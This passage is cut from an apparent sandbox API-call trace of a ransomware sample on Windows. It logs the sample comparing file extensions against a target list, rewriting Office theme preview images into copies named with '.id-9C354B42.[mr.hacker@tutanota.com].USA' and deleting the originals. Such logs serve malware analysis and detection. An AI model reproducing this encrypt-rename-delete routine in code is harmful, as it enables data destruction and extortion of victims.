(lpString=".xls") returned 4 [0045.290] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0045.290] lstrlenW (lpString=".xlsx") returned 5 [0045.290] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0045.290] lstrlenW (lpString=".ppt") returned 4 [0045.290] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0045.290] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\THMBNAIL.PNG") returned 76 [0045.290] lstrlenW (lpString=".zip") returned 4 [0045.290] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0045.290] lstrlenW (lpString=".rar") returned 4 [0045.290] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0045.290] lstrlenW (lpString=".bz2") returned 4 [0045.291] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0045.291] lstrlenW (lpString=".7z") returned 3 [0045.291] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0045.291] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\THMBNAIL.PNG") returned 76 [0045.291] lstrlenW (lpString=".dbf") returned 4 [0045.291] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0045.291] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\THMBNAIL.PNG") returned 76 [0045.291] lstrlenW (lpString=".1cd") returned 4 [0045.291] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0045.291] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\THMBNAIL.PNG") returned 76 [0045.291] lstrlenW (lpString=".jpg") returned 4 [0045.291] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0045.291] lstrcmpiW (lpString1=".GIF", lpString2=".USA") returned -1 [0045.291] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0045.291] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\compass\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0045.291] GetFileSizeEx (in: hFile=0x20c, lpFileSize=0x2baff1c | out: lpFileSize=0x2baff1c*=1293) returned 1 [0045.291] CloseHandle (hObject=0x20c) returned 1 [0045.291] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\compass\\preview.gif")) returned 0x20 [0045.291] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\PREVIEW.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\compass\\preview.gif.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0045.292] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\compass\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0045.292] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0045.292] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0045.292] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\PREVIEW.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\compass\\preview.gif.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc [0045.596] GetLastError () returned 0x0 [0045.596] ReadFile (in: hFile=0x20c, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x50d, lpOverlapped=0x0) returned 1 [0045.699] WriteFile (in: hFile=0x1fc, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0x510, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0x510, lpOverlapped=0x0) returned 1 [0045.700] ReadFile (in: hFile=0x20c, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x0, lpOverlapped=0x0) returned 1 [0045.700] WriteFile (in: hFile=0x1fc, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0xea, lpOverlapped=0x0) returned 1 [0045.700] SetEndOfFile (hFile=0x1fc) returned 1 [0045.701] CloseHandle (hObject=0x1fc) returned 1 [0045.701] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0045.701] SetEndOfFile (hFile=0x20c) returned 1 [0045.701] CloseHandle (hObject=0x20c) returned 1 [0045.702] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\PREVIEW.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0045.702] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\compass\\preview.gif")) returned 1 [0045.702] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\PREVIEW.GIF") returned 75 [0045.702] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\PREVIEW.GIF") returned 75 [0045.702] lstrlenW (lpString=".doc") returned 4 [0045.702] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0045.702] lstrlenW (lpString=".docx") returned 5 [0045.702] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0045.702] lstrlenW (lpString=".pdf") returned 4 [0045.702] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0045.702] lstrlenW (lpString=".xls") returned 4 [0045.702] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0045.702] lstrlenW (lpString=".xlsx") returned 5 [0045.702] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0045.702] lstrlenW (lpString=".ppt") returned 4 [0045.702] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0045.702] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\PREVIEW.GIF") returned 75 [0045.702] lstrlenW (lpString=".zip") returned 4 [0045.702] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0045.702] lstrlenW (lpString=".rar") returned 4 [0045.702] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0045.702] lstrlenW (lpString=".bz2") returned 4 [0045.702] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0045.703] lstrlenW (lpString=".7z") returned 3 [0045.703] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0045.703] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\PREVIEW.GIF") returned 75 [0045.703] lstrlenW (lpString=".dbf") returned 4 [0045.703] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0045.703] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\PREVIEW.GIF") returned 75 [0045.703] lstrlenW (lpString=".1cd") returned 4 [0045.703] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0045.703] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\PREVIEW.GIF") returned 75 [0045.703] lstrlenW (lpString=".jpg") returned 4 [0045.703] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0045.703] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\PREVIEW.GIF") returned 75 [0045.703] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\PREVIEW.GIF") returned 75 [0045.703] lstrlenW (lpString=".doc") returned 4 [0045.703] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0045.703] lstrlenW (lpString=".docx") returned 5 [0045.703] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0045.703] lstrlenW (lpString=".pdf") returned 4 [0045.703] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0045.703] lstrlenW (lpString=".xls") returned 4 [0045.703] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0045.703] lstrlenW (lpString=".xlsx") returned 5 [0045.703] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0045.703] lstrlenW (lpString=".ppt") returned 4 [0045.703] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0045.703] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\PREVIEW.GIF") returned 75 [0045.703] lstrlenW (lpString=".zip") returned 4 [0045.703] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0045.703] lstrlenW (lpString=".rar") returned 4 [0045.703] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0045.703] lstrlenW (lpString=".bz2") returned 4 [0045.703] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0045.703] lstrlenW (lpString=".7z") returned 3 [0045.703] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0045.703] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\PREVIEW.GIF") returned 75 [0045.704] lstrlenW (lpString=".dbf") returned 4 [0045.704] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0045.704] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\PREVIEW.GIF") returned 75 [0045.704] lstrlenW (lpString=".1cd") returned 4 [0045.704] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0045.704] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\PREVIEW.GIF") returned 75 [0045.704] lstrlenW (lpString=".jpg") returned 4 [0045.704] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0045.704] lstrcmpiW (lpString1=".GIF", lpString2=".USA") returned -1 [0045.704] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0045.704] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\echo\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0045.704] GetFileSizeEx (in: hFile=0x20c, lpFileSize=0x2baff1c | out: lpFileSize=0x2baff1c*=1453) returned 1 [0045.704] CloseHandle (hObject=0x20c) returned 1 [0045.704] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\echo\\preview.gif")) returned 0x20 [0045.704] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\PREVIEW.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\echo\\preview.gif.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0045.705] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\echo\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0045.705] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0045.705] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0045.705] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\PREVIEW.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\echo\\preview.gif.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0046.009] GetLastError () returned 0x0 [0046.009] ReadFile (in: hFile=0x20c, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x5ad, lpOverlapped=0x0) returned 1 [0046.011] WriteFile (in: hFile=0x160, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0x5b0, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0x5b0, lpOverlapped=0x0) returned 1 [0046.012] ReadFile (in: hFile=0x20c, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x0, lpOverlapped=0x0) returned 1 [0046.012] WriteFile (in: hFile=0x160, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0xea, lpOverlapped=0x0) returned 1 [0046.012] SetEndOfFile (hFile=0x160) returned 1 [0046.012] CloseHandle (hObject=0x160) returned 1 [0046.012] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0046.012] SetEndOfFile (hFile=0x20c) returned 1 [0046.013] CloseHandle (hObject=0x20c) returned 1 [0046.013] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\PREVIEW.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0046.013] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\echo\\preview.gif")) returned 1 [0046.013] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\PREVIEW.GIF") returned 72 [0046.014] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\PREVIEW.GIF") returned 72 [0046.014] lstrlenW (lpString=".doc") returned 4 [0046.014] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0046.014] lstrlenW (lpString=".docx") returned 5 [0046.014] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0046.014] lstrlenW (lpString=".pdf") returned 4 [0046.014] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0046.014] lstrlenW (lpString=".xls") returned 4 [0046.014] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0046.014] lstrlenW (lpString=".xlsx") returned 5 [0046.014] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0046.014] lstrlenW (lpString=".ppt") returned 4 [0046.014] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0046.014] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\PREVIEW.GIF") returned 72 [0046.014] lstrlenW (lpString=".zip") returned 4 [0046.014] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0046.014] lstrlenW (lpString=".rar") returned 4 [0046.014] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0046.014] lstrlenW (lpString=".bz2") returned 4 [0046.014] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0046.014] lstrlenW (lpString=".7z") returned 3 [0046.014] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0046.014] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\PREVIEW.GIF") returned 72 [0046.014] lstrlenW (lpString=".dbf") returned 4 [0046.014] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0046.014] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\PREVIEW.GIF") returned 72 [0046.014] lstrlenW (lpString=".1cd") returned 4 [0046.014] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0046.014] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\PREVIEW.GIF") returned 72 [0046.014] lstrlenW (lpString=".jpg") returned 4 [0046.014] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0046.014] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\PREVIEW.GIF") returned 72 [0046.014] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\PREVIEW.GIF") returned 72 [0046.014] lstrlenW (lpString=".doc") returned 4 [0046.015] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0046.015] lstrlenW (lpString=".docx") returned 5 [0046.015] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0046.015] lstrlenW (lpString=".pdf") returned 4 [0046.015] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0046.015] lstrlenW (lpString=".xls") returned 4 [0046.015] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0046.015] lstrlenW (lpString=".xlsx") returned 5 [0046.015] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0046.015] lstrlenW (lpString=".ppt") returned 4 [0046.015] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0046.015] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\PREVIEW.GIF") returned 72 [0046.015] lstrlenW (lpString=".zip") returned 4 [0046.015] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0046.015] lstrlenW (lpString=".rar") returned 4 [0046.015] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0046.015] lstrlenW (lpString=".bz2") returned 4 [0046.015] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0046.015] lstrlenW (lpString=".7z") returned 3 [0046.015] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0046.015] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\PREVIEW.GIF") returned 72 [0046.015] lstrlenW (lpString=".dbf") returned 4 [0046.015] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0046.015] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\PREVIEW.GIF") returned 72 [0046.015] lstrlenW (lpString=".1cd") returned 4 [0046.015] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0046.015] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\PREVIEW.GIF") returned 72 [0046.015] lstrlenW (lpString=".jpg") returned 4 [0046.015] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0046.015] lstrcmpiW (lpString1=".GIF", lpString2=".USA") returned -1 [0046.015] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0046.015] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\eclipse\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0046.018] GetFileSizeEx (in: hFile=0x20c, lpFileSize=0x2baff1c | out: lpFileSize=0x2baff1c*=1347) returned 1 [0046.018] CloseHandle (hObject=0x20c) returned 1 [0046.018] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\eclipse\\preview.gif")) returned 0x20 [0046.018] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\PREVIEW.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\eclipse\\preview.gif.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0046.018] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\eclipse\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0046.018] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0046.018] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0046.018] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\PREVIEW.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\eclipse\\preview.gif.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0046.023] GetLastError () returned 0x0 [0046.023] ReadFile (in: hFile=0x20c, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x543, lpOverlapped=0x0) returned 1 [0046.031] WriteFile (in: hFile=0x174, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0x550, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0x550, lpOverlapped=0x0) returned 1 [0046.032] ReadFile (in: hFile=0x20c, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x0, lpOverlapped=0x0) returned 1 [0046.032] WriteFile (in: hFile=0x174, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0xea, lpOverlapped=0x0) returned 1 [0046.032] SetEndOfFile (hFile=0x174) returned 1 [0046.032] CloseHandle (hObject=0x174) returned 1 [0046.032] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0046.032] SetEndOfFile (hFile=0x20c) returned 1 [0046.033] CloseHandle (hObject=0x20c) returned 1 [0046.033] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\PREVIEW.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0046.034] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\eclipse\\preview.gif")) returned 1 [0046.034] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\PREVIEW.GIF") returned 75 [0046.034] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\PREVIEW.GIF") returned 75 [0046.034] lstrlenW (lpString=".doc") returned 4 [0046.034] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0046.034] lstrlenW (lpString=".docx") returned 5 [0046.034] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0046.034] lstrlenW (lpString=".pdf") returned 4 [0046.034] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0046.034] lstrlenW (lpString=".xls") returned 4 [0046.034] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0046.034] lstrlenW (lpString=".xlsx") returned 5 [0046.034] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0046.034] lstrlenW (lpString=".ppt") returned 4 [0046.034] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0046.034] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\PREVIEW.GIF") returned 75 [0046.034] lstrlenW (lpString=".zip") returned 4 [0046.034] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0046.034] lstrlenW (lpString=".rar") returned 4 [0046.034] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0046.034] lstrlenW (lpString=".bz2") returned 4 [0046.034] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0046.034] lstrlenW (lpString=".7z") returned 3 [0046.034] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0046.034] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\PREVIEW.GIF") returned 75 [0046.034] lstrlenW (lpString=".dbf") returned 4 [0046.034] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0046.035] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\PREVIEW.GIF") returned 75 [0046.035] lstrlenW (lpString=".1cd") returned 4 [0046.035] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0046.035] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\PREVIEW.GIF") returned 75 [0046.035] lstrlenW (lpString=".jpg") returned 4 [0046.035] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0046.035] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\PREVIEW.GIF") returned 75 [0046.035] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\PREVIEW.GIF") returned 75 [0046.035] lstrlenW (lpString=".doc") returned 4 [0046.035] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0046.035] lstrlenW (lpString=".docx") returned 5 [0046.035] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0046.035] lstrlenW (lpString=".pdf") returned 4 [0046.035] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0046.035] lstrlenW (lpString=".xls") returned 4 